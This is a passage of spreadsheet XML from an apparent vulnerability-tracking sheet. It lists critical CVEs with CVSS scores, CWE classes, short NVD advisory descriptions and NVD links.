          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr"/>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr"/>
      <c r="Q43" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible memory safety issue due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49921</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52111</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr"/>
      <c r="Q44" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>An issue in fast-note-sync-service &lt;=2.13.7 allows a remote attacker to escalate privileges via the admin configuration endpoint exposes authTokenKey</t>
        </is>
      </c>
      <c r="S44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52111</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55559</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr"/>
      <c r="Q45" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-470, CWE-94</t>
        </is>
      </c>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs inserts templateArgs from POST /api/instances and PATCH /api/instances/{instance} into YAML through VarStatement.append in yamcs-core/src/main/java/org/yamcs/templating/VarStatement.java without YAML-context escaping. The rendered configuration is parsed by YamcsServer.createInstance and loaded by YamcsServerInstance, allowing an attacker to inject a services entry for org.yamcs.ProcessRunner. Deployments without security.yaml expose the operation through the guest superuser, while secured deployments require SystemPrivilege.CreateInstances. Successful exploitation executes commands as the Yamcs service account. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="S45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55559</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58240</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr"/>
      <c r="Q46" s="5" t="inlineStr">
        <is>
          <t>CWE-308</t>
        </is>
      </c>
      <c r="R46"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S46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58240</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58822</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr"/>
      <c r="Q47" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of ftsmooth.c, there is a possible memory safety issue due to improper casting. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58822</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61516</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr"/>
      <c r="Q48" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>Netis NX10 firmware V4.0.1.5808 and V3.0.0.4142 contain an information disclosure vulnerability that allows unauthenticated attackers to retrieve the administrator password by sending a request to the sysinfo action in the web management interface without a valid session. Attackers can replay the exposed credential against the login handler to establish a fully authenticated administrator session on the device.</t>
        </is>
      </c>
      <c r="S48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61516</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62916</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr">
        <is>
          <t>microsoft:entra_id</t>
        </is>
      </c>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr"/>
      <c r="Q49" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass using an alternate path or channel in Microsoft Entra ID allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62916</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66302</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr"/>
      <c r="Q50" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Skype for Business allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66302</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68839</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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1" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr"/>
      <c r="Q51" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Mass Storage Class Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68839</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69276</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr"/>
      <c r="Q52" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft UxTheme Library (uxtheme.dll) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69276</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69408</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr"/>
      <c r="Q53" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69408</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69431</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr"/>
      <c r="Q54" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69431</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69463</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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5" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr"/>
      <c r="Q55" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69463</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69491</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr"/>
      <c r="Q56" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Microsoft DirectMusic allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69491</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69493</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr"/>
      <c r="Q57" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69493</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69496</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr"/>
      <c r="Q58" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Compressed Folder allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69496</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69525</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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9" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr"/>
      <c r="Q59" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69525</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69579</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr"/>
      <c r="Q60" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69579</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69586</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="n">
        <v>0.01</v>
      </c>
